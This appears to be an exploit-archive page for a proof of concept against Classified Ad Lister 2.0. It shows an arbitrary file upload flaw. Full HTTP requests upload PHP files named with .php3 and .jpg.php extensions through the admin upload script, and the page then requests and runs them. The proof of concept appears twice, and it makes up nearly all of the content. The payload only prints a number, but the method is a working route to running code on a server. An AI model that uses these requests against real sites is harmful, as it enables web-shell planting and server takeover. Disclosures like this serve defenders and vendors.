what you don't know can hurt you

Classified Ad Lister 2.0 Arbitrary File Upload

Classified Ad Lister 2.0 Arbitrary File Upload
Posted Apr 1, 2019
Authored by Mehmet Emiroglu

Classified Ad Lister version 2.0 suffers from an arbitrary file upload vulnerability.

tags | exploit, arbitrary, file upload
MD5 | b866bad380e0c3b19bc902c7eb5f1dae

Classified Ad Lister 2.0 Arbitrary File Upload

Change Mirror Download
===========================================================================================
# Exploit Title: Classified Ad Lister v2.0 - 'uploads' Arbitrary File Upload
# Dork: N/A
# Date: 25-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.netartmedia.net/adlister
# Software Link: https://www.netartmedia.net/adlister
# Version: v2.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Classified Ad Lister is a free, responsive and easy
to install php script
(not using any database, so the installation is as easy as copying the
files to the website or folder you prefer)
which allows to manage and show classified or product listings on a
website.
===========================================================================================
# POC - Arbitrary File Upload
# Parameters : uploads
# POST Method :
http://localhost/classified/admin/uploads/d571bf7952b140d4bff5d1c272e9c992.php3
# Injection Request
POST /classified/admin/upload.php HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 248
Content-Type: multipart/form-data; boundary=0eaa6514f42e46cbb8d84e040ff20287
Cookie:
AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661;
PHPSESSID=banppj2nuinahv1v8itb1c1nan
Origin: http://localhost
Referer: http://localhost/classified/admin/index.php?page=add
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

--0eaa6514f42e46cbb8d84e040ff20287
Content-Disposition: form-data; name="myfile[]";
filename="d571bf7952b140d4bff5d1c272e9c992.php3"
Content-Type: application/octet-stream

<?php print(int)0xFFF9999-24 ?>
--0eaa6514f42e46cbb8d84e040ff20287--

# Identification Page
GET /classified/admin/uploads/d571bf7952b140d4bff5d1c272e9c992.php3 HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie:
AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661;
PHPSESSID=banppj2nuinahv1v8itb1c1nan
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

# Injection Response
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/7.2.14
X-Powered-By: PHP/7.2.14
Content-Length: 41
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Mar 2019 14:46:40 GMT

["d571bf7952b140d4bff5d1c272e9c992.php3"]

# Identification Page
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/7.2.14
X-Powered-By: PHP/7.2.14
Content-Length: 9
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Mar 2019 14:46:40 GMT
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Classified Ad Lister v2.0 - 'uploads' Arbitrary File Upload
# Dork: N/A
# Date: 25-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.netartmedia.net/adlister
# Software Link: https://www.netartmedia.net/adlister
# Version: v2.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Classified Ad Lister is a free, responsive and easy
to install php script
(not using any database, so the installation is as easy as copying the
files to the website or folder you prefer)
which allows to manage and show classified or product listings on a
website.
===========================================================================================
# POC - Arbitrary File Upload
# Parameters : uploads
# POST Method :
http://localhost/classified/admin/uploads/ad14667cae5d4e28bfb5b53df1687ed6.jpg.php
# Injection Request
POST /classified/admin/upload.php HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 251
Content-Type: multipart/form-data; boundary=0eaa6514f42e46cbb8d84e040ff20287
Cookie:
AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661;
PHPSESSID=banppj2nuinahv1v8itb1c1nan
Origin: http://localhost
Referer: http://localhost/classified/admin/index.php?page=add
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

--0eaa6514f42e46cbb8d84e040ff20287
Content-Disposition: form-data; name="myfile[]";
filename="ad14667cae5d4e28bfb5b53df1687ed6.jpg.php"
Content-Type: application/octet-stream

<?php print(int)0xFFF9999-24 ?>
--0eaa6514f42e46cbb8d84e040ff20287--

# Identification Page
GET /classified/admin/uploads/ad14667cae5d4e28bfb5b53df1687ed6.jpg.php
HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie:
AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661;
PHPSESSID=banppj2nuinahv1v8itb1c1nan
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

# Injection Response
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/7.2.14
X-Powered-By: PHP/7.2.14
Content-Length: 44
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Mar 2019 14:46:40 GMT

["ad14667cae5d4e28bfb5b53df1687ed6.jpg.php"]

# Identification Page
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/7.2.14
X-Powered-By: PHP/7.2.14
Content-Length: 9
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Mar 2019 14:46:40 GMT
===========================================================================================

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    2 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close